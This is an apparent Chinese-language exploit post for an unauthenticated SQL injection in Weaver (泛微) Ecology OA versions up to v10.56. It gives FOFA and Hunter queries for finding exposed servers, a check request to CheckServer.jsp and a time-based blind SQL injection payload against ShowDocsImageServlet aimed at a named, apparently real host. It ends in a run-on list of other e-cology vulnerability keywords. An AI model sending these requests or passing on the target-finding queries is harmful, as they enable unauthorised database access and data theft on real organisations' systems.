漏洞描述
泛微 Ecology OA 系统对用户传入的数据过滤处理不当,导致存在 SQL 注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。
影响版本
泛微 Ecology 9.x <= v10.56;泛微 Ecology 8.x <= v10.56
漏洞复现
fofa查询语法:app="泛微-协同办公OA"
鹰图查询语法:app.name="泛微 e-cology 9.0 OA"
登录页面如下:
POC:
GET /mobile/plugin/CheckServer.jsp?type=mobileSetting HTTP/1.1
Host: ***
Connection: close
访问/mobile/plugin/CheckServer.jsp?type=mobileSetting ,返回状态码200且参数值为{“error”;”system error”}
Payload:
GET /weaver/weaver.docs.docs.ShowDocsImageServlet?docId=1%2F**%2Fand(select%2F**%2F1)%3E0%2F**%2Fwaitfor%2F**%2Fdelay'0%3A0%3A10'%2F**%2F HTTP/1.1
Host: oa.ap365.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Connection: close
- CheckServer 路径 漏洞 E-Cology Cologycheckserver路径 漏洞e-cology ifnewscheckoutbycurrentuser漏洞e-cology filedownloadforoutdoc漏洞e-cology cology filedownload漏洞e-cology目录 漏洞e-cology browser cology springframework漏洞e-cology文件 漏洞e-cology loginsso cology 漏洞e-cology cology 16177 漏洞e-cology getdata cology workflowcentertreedata漏洞e-cology cology